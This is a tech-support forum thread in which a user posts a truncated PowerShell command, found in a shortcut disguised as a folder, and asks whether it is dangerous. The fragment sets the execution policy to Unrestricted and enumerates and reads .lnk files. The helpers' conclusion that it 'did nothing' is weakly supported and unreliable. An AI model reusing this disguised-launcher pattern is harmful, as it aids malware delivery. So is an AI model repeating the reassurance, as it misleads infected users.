Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

powershell script - is it dangerous?

- - - - -

  • Please log in to reply

#1
Gumby©

Gumby©

    Member

  • Member
  • PipPip
  • 25 posts

I recently was helping a friend with her computer and came across a script posing as a folder. It was this:

 

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted function IJ($A) {$L = $Null;Get-ChildItem $A -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$Hu = [String](Get-Content $_.FullName);$

 

Anyone know what this does? Is it dangerous if clicked? If so, can it be reversed? Thanks for you time.


  • 0

Advertisements


#2
DR M

DR M

    The Grecian Geek

  • Malware Removal
  • 3,150 posts

Have you run a scan with the default antivirus?


  • 0

#3
Gumby©

Gumby©

    Member

  • Topic Starter
  • Member
  • PipPip
  • 25 posts

Yes and nothing came up. Still wondering what it does.


  • 0

#4
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 7,820 posts

Hello [email protected]

 

"It's only part of a script.
 
The code sets the Execution   policy to Unrestricted (not good)
 
It then iterates through supposedly a folder passed to the function of all shortcuts in that folder
 
and copies the contents of each shortcut.
 
It's useless without parameters being passed to it."

  • 0

#5
Gumby©

Gumby©

    Member

  • Topic Starter
  • Member
  • PipPip
  • 25 posts

Thanks zep516. Glad to know it did nothing.


  • 0

#6
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 7,820 posts

You're welcome.

 

I actually had to get some help from someone and just conveyed his information to you .


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP